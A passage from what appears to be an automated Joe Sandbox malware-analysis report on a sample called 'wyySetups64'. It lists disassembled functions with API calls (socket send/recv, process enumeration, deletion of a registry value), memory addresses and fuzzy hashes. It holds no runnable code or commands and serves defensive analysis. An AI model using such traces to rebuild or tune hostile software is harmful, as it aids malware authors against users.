                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dadeaccc8c238386d51fe6cfb1d703d6e0afd33a2f2936b1a4b7805af0e0710
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F11DAB1D04249DFDB00EFA5D845AADBBF1FF04314F1084AAF868A7351EB389A159F50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 033905D6
                                                                                                                                                                                                                • Part of subcall function 033900B7: __getptd.LIBCMT ref: 033900C5
                                                                                                                                                                                                                • Part of subcall function 033900B7: __getptd.LIBCMT ref: 033900D3
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905E0
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905EE
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905FC
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03390607
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0339062D
                                                                                                                                                                                                                • Part of subcall function 0339015C: __CallSettingFrame@12.LIBCMT ref: 033901A8
                                                                                                                                                                                                                • Part of subcall function 033906D4: __getptd.LIBCMT ref: 033906E3
                                                                                                                                                                                                                • Part of subcall function 033906D4: __getptd.LIBCMT ref: 033906F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 862cfdbe64fce7dbd0d94a6b668e93aa1c835855f9061bfc24ef08d2b1b86ca8
                                                                                                                                                                                                              • Instruction ID: 90ad418182500fcef025726369ea03d39c74f62546801a34df6eaaf693138634
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 862cfdbe64fce7dbd0d94a6b668e93aa1c835855f9061bfc24ef08d2b1b86ca8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0811D7B9D0130ADFDF10EFA4D485AADBBB0FF04714F10806AE825AB350DB789A559F50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 0320FF95
                                                                                                                                                                                                                • Part of subcall function 0320FA76: __getptd.LIBCMT ref: 0320FA84
                                                                                                                                                                                                                • Part of subcall function 0320FA76: __getptd.LIBCMT ref: 0320FA92
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FF9F
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFAD
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFBB
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFC6
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0320FFEC
                                                                                                                                                                                                                • Part of subcall function 0320FB1B: __CallSettingFrame@12.LIBCMT ref: 0320FB67
                                                                                                                                                                                                                • Part of subcall function 03210093: __getptd.LIBCMT ref: 032100A2
                                                                                                                                                                                                                • Part of subcall function 03210093: __getptd.LIBCMT ref: 032100B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                              • Instruction ID: 59944461c995fa656a8a540bb002e19a6fb7a317082d233b9e245bb023b121af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11F679D10309DFDB00EFA4D984AED7BB0FF08310F10C0A9E914AB291DB789A959F50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDD9CA
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00BDD9EA
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BDD9FA
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00BDDA17
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BDDA2A
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(02851658), ref: 00BDDA42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                                                                                              • Opcode ID: 9013e588c47e6f2d5ad9f2f0280badfb257dc267d3d0ab7caf59ce539656b468
                                                                                                                                                                                                              • Instruction ID: faa7c9d5df0e230c5f1ed45ca2bd81b5e264a5e098bef0d89032b6b951776ab7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9013e588c47e6f2d5ad9f2f0280badfb257dc267d3d0ab7caf59ce539656b468
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA01C472945A219BC721AFB4984579DF7E1EF00720F044197F8946B381EB346941CBD5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03384891
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 033848B1
                                                                                                                                                                                                              • __lock.LIBCMT ref: 033848C1
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 033848DE
                                                                                                                                                                                                              • _free.LIBCMT ref: 033848F1
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(03521658), ref: 03384909
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                                                                                              • Opcode ID: 5e6b918aec1dff99292612737626acd43dd1ad4712911b1655a1f4d261edf375
                                                                                                                                                                                                              • Instruction ID: 804909ed4664208f89d896188ddf56c88b6390d31f5cd14e2339a02e96ef11ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6b918aec1dff99292612737626acd43dd1ad4712911b1655a1f4d261edf375
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0201D635D01B57EBE720FF2698C575DB3A4BF04B21F08040AE850ABA84CB756541CBD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 00BD48F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD4914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 00BD492E
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1019945655-0
                                                                                                                                                                                                              • Opcode ID: 93cafdc9b73908511710c78d7bdfee4c97ca560808e0c63c2cffdc0df655b4c3
                                                                                                                                                                                                              • Instruction ID: a98db7289631b788eb759541ece9a7f2d5201627013bb26a0e281eeaebf6f7e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93cafdc9b73908511710c78d7bdfee4c97ca560808e0c63c2cffdc0df655b4c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF090322046045BC220EBAADC84D4BF3E9EFC9720B204B19F26987791CA74FC018BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 03379BD2
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BE3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BF8
                                                                                                                                                                                                              • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03379B7B), ref: 03379C04
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C15
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C1C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4268643673-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 033748E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 033748EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 033748F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03374914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0337492E
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1019945655-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03373311
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 0337331E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03373326
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03373332
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0337333A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0337334B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3137405945-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00BE3A63
                                                                                                                                                                                                                • Part of subcall function 00BE39BE: ___BuildCatchObjectHelper.LIBCMT ref: 00BE39F4
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00BE3A7A
                                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 00BE3A88
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 0339096E
                                                                                                                                                                                                                • Part of subcall function 033908C9: ___BuildCatchObjectHelper.LIBCMT ref: 033908FF
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 03390985
                                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 03390993
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0337B800
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0337B810
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B81B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                              • String ID: Console$IpDatespecial
                                                                                                                                                                                                              • API String ID: 849931509-1840232981
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7AA29978), ref: 0337B9DA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B9FB
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BA4B
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0337BA65
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0337BAB7
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2416807333-0
                                                                                                                                                                                                              • Opcode ID: 522fdc32b3445cc15fa7cffb9ae4fc7d41fc51902e5f0f1809fd5722305aab63
                                                                                                                                                                                                              • Instruction ID: 45148710f85663d8fcf5742deeb8b41bf657ed6f4fbd0ade0968d7f6b532b70c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 522fdc32b3445cc15fa7cffb9ae4fc7d41fc51902e5f0f1809fd5722305aab63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B41C371D00609EBEB20EF64CCC5FAAF7B8EF15714F044299E9159B280E7799A40CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 00BD3CBF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3CFA
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00BD3D45
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3D7B
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3DA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$recv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 316788870-0
                                                                                                                                                                                                              • Opcode ID: ede1078a5c068e9a45cccc0eca92862cabc8ac71a859479208bfc41832770a66
                                                                                                                                                                                                              • Instruction ID: b57fcd23b4c3331e98c39aebbf76bd067be9d7c9a3178cd6e2087e952d3fa46e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ede1078a5c068e9a45cccc0eca92862cabc8ac71a859479208bfc41832770a66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31D3726142008BEB649F28D8C8759B7EAEB85724F1401B7ED05DB397EB31DD808B52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 03373CBF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373CFA
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 03373D45
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373D7B
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373DA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$recv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 316788870-0
                                                                                                                                                                                                              • Opcode ID: 57a8e8b1eeb274b3afe86c1eb353cb04ef5cf9b4b6bc5c2e159f31d10e9ebf28
                                                                                                                                                                                                              • Instruction ID: 06bdabf8786ae9a43fda5ab3c93344f2ccbbb42fa1c385f6c821a731067c280d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57a8e8b1eeb274b3afe86c1eb353cb04ef5cf9b4b6bc5c2e159f31d10e9ebf28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6931D37A604200DFEB74DF68D8C8B6A77ADFB45330F140566ED09CB289D739D8819B91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BDE5E5
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BDE5F8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1020059152-0
                                                                                                                                                                                                              • Opcode ID: 3ed55e2b8fef365c3326a843674a1f9ae4fd7c67314d6d3c24b7aee7afb4db43
                                                                                                                                                                                                              • Instruction ID: dd53491fafd4a60f1c0489022384b0d0c9a03c96c6ceea98afdc0d119f380ac9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed55e2b8fef365c3326a843674a1f9ae4fd7c67314d6d3c24b7aee7afb4db43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C411E732408511ABCB323F74AC09A5EBBD5EF603A0B2005E7F4689F351FF34D8408A94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03380EF9
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
